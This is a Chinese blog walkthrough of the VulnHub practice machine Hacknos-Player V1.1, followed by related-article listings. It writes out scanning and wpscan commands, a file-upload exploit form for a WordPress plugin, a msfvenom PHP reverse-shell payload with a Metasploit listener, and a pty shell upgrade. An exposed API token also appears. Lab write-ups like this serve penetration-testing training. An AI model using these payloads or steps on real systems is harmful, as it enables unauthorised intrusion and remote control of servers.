Hacknos-Player V1.1靶机

最新推荐文章于 2024-09-15 20:34:10 发布
最新推荐文章于 2024-09-15 20:34:10 发布
阅读量527 收藏 3
点赞数 15
文章标签: 网络安全 安全 web安全 github 开源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/140445951
版权

靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/

一、信息收集

步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下...

步骤二:使用nmap对网络进行扫描并发现192.168.7.9是要攻击的目标...确认开放的端口...

步骤三:访问网站...并使用dirsearch进行目录扫描...没有啥有价值的信息...

dirsearch -u http://192.168.7.9/

步骤四:回到页面上发现网站路径...为/var/www/html/g@web对其进行访问使用火狐插件Wappalyzer发现站点为Wordpress5.3.2...

步骤五:再次使用dirsearch进行目录扫描

dirsearch -u http://192.168.7.9/g@web/

拼接/wp-login.php,发现一个登录框

步骤六:尝试使用wpscan列出站点的用户和密码...

wpscan --url https://www.xxxxx.wiki/    #扫描站点
wpscan --url https://www.xxxxx.wiki/ --enumerate p    #扫描插件
wpscan --url http://xx.xx.xx.xx/g@web/ --enumerate u    #枚举用户

枚举用户

wpscan --url http://192.168.7.9/g@web/ --enumerate u

步骤七:拼接/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1访问...可在描述字段中发现一个密码hackNos@9012!!对其默认后台登录界面访问并尝试登录...

输入wp-local hackNos@9012登录失败显示密码不正确

步骤八:使用wpscan对其网站进行漏洞扫描...发现远程代码执行漏洞...对其利用信息访问...拿取到POC并修改保存成HTML文件..

wpscan --url http://192.168.7.9/g@web -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现远程代码执行漏洞 ——>WP Support Plus Responsive Ticket System < 8.0.8 – Remote Code Execution (RCE) | Plugin Vulnerabilities,访问得到利用代码(漏洞验证网站)

<form method="post" enctype="multipart/form-data" action="http://192.168.7.9/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>


After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

二、GetShell

步骤九:使用MSF生成PHP木马并开启监听(漏洞验证网站建议我们使用.phtml后缀绕过)...

####生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.250 LPORT=4455 x> shell.phtml

####开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.7.250
set LPORT  4455
exploit
####Shell上传页面
http://192.168.1.124/g@web/wp-content/uploads/wpsp/
####调用/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'

kali开启一个服务

浏览器访问192.168.7.250:8000(kali的ip及服务开放的端口)

将生成的shell.phtml下载到本地进行上传

拼接访问/g@web/wp-content/uploads/wpsp/

点击172...shell.phtml,查看kali发现反弹成功

嗷嗷~嗷嗷~
关注
Hacknos-Player V1.1靶机渗透测试
weixin_58786230的博客
07-12 239
【代码】Hacknos-Player V1.1靶机渗透测试。
hackNos: Player v1.1靶机渗透
siaowei44的博客
07-26 512
概述 该靶机 下载地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 准备事项:在vulnhub下载的靶机很多时候都无法获得ip地址,这个问题困扰我很久,今天我探寻到一个有效的解决办法https://blog.csdn.net/asstart/article/details/103433065?utm_source=app ip地址 操作系统 靶机 192.168.74.198 Ubuntu 攻击主机 .
Vulnhub靶机HACKNOS_ PLAYER V1.1
LainWith的博客
02-12 1273
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站Getshell提权sudo提权获取所有Flag 介绍 系列: hackNos(此系列共7台) 发布日期:2020年04月10日 难度:初级-中级 Flag : 1个,根用户的root.txt 学习: wordpress 安全测试 远程代码执行 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 信息收集 主机发现 arp-
VulnHub:Hacknos-Player V1.1靶机
wbplife的博客
07-12 371
root用户目录下的root.txt。
Vulnhub:Player-v1.1靶机
qq_43884092的博客
02-06 85
访问80端口发现存在一个目录,wpscan扫描发现存在一个插件,和一个用户:`wp-local`,该插件存在越权,
Vulnhub——HackNos-2.1
2301_76786857的博客
06-15 138
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
player _v1.1靶机
weixin_73074638的博客
07-14 291
看到开启了数据库和web服务,访问80和3306端口拼接js接口路径。
VulnHub—Os-hackNos-2.1
weixin_39219503的博客
12-27 604
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/ 题目信息如下,难度中等偏下,需要获取俩个flag Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : Web Applicati...
No.49-VulnHub-hackNos: Os-hackNos-2.1-Walkthrough渗透学习
qq_34801745的博客
02-09 758
** VulnHub-hackNos: Os-hackNos-2.1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 靶机难度:容易+中级(CTF) 靶机发布日期:2019年11月29日 靶机描述: Difficulty : Easy to Intermediate Flag : 2 Flag fi...
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
Os-HackNos-2.1靶机
weixin_46062722的博客
11-18 290
实验环境 攻击机器IP地址:192.168.4.93 目标靶机IP地址:192.168.4.87 网络环境:桥接网络 信息收集 先查看攻击机kali Linux的IP地址 命令:ifconfig 得到自己的IP地址192.168.4.93 我们用Nmap扫描一下存活的主机 命令:nmap -sP 192.168.4.0/24 得到目标靶机IP地址为192.168.4.87 既然我们得到了目标靶机的IP地址,用nmap工具进行端口扫描,发现开放了22和80端口 命令:nmap -A -v 192.16
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1373
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1139
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
无限边界:现代整合安全如何保护云
最新发布
网络研究观
09-15 667
通过工具之间更有效的数据共享,整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性(无论是在云端还是在本地),让您能够看到无限周界的边缘。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 510
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值